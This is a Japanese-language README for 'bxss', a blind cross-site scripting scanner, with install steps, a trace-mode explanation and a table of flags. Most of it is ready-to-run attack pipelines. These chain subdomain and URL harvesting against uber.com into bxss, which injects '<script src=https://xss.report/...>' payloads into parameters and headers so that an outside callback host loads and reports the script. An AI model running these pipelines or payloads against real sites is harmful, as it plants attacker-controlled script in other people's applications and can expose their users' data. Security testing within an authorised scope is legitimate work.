
Blind XSS Scannerは、WebアプリケーションのブラインドXSS脆弱性をスキャンするために使用できるツールです。
Bxss は、WebアプリケーションにおけるブラインドXSS脆弱性の検出を自動化する高性能なブラインドXSSスキャナーです。
現在、低スペックデバイス上でのbxssのパフォーマンスを向上させるため、Chromiumベースのワーカープールの統合に積極的に取り組んでいます。
この機能により、DOMベースのXSS検出やトリガー後のペイロード検査などのリソースを多く消費するタスクを、プールで管理される軽量なChromiumインスタンスにオフロードできるようになります。複数のヘッドレスブラウザコンテキストにワークロードを制御し効率的に分散することで、bxssは低スペックなマシンでも応答性が高く使い続けられるようになります。
これにより、bxssはシステムの制約に関わらず、強力でありながら非常にアクセスしやすいツールになります。
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
トレースモードは、BlindXSSがトリガーされた場所を追跡できる実験的な機能です。https://xss.report/ などのサードパーティのBlindXSSプラットフォームでは、ペイロードにカスタムパラメータを指定できます。これにより、BlindXSSがトリガーされた場所を追跡できます。例えば、ペイロードに url=https://somehost.com というパラメータを指定すると、ツールは以下のペイロードを使用します。
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
そして、トリガーが発生すると、DOMを検査してBlindXSSがどのホストからトリガーされたかを確認できます。
ダッシュボードでカスタムパラメータを割り当てる際は、url={LINK} を割り当ててください。そうすることで、bxssが自動的に {LINK} を実際のURLに置き換えます。
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
高度なDorkingと脆弱性探索については、Dorkiをチェックして、今すぐサインアップしてください!
このツールを使ってバウンティを獲得した場合は、コーヒーを一杯ごちそうすることでサポートを検討してください!
| 引数 | 説明 | デフォルト |
|---|
-a | パラメータにペイロードを追加 | false |
-c int | 並行処理レベルを設定 | 30 |
-H string | カスタムヘッダーを設定 | "" |
-hf string | ヘッダーを含むファイルのパス | "" |
-p string | ブラインドXSSペイロード | "" |
-pf string | ペイロードを含むファイルのパス | "" |
-t | ブラインドXSS用のパラメータをテスト | false |
-X string | 使用するHTTPメソッド | "" |
-v | デバッグモードを有効にする | false |
-rl float | レート制限(1秒あたりのリクエスト数) | 0 |
-f | リダイレクトを追跡 | false |
-l | トレースモードを有効にする(実験的) | false |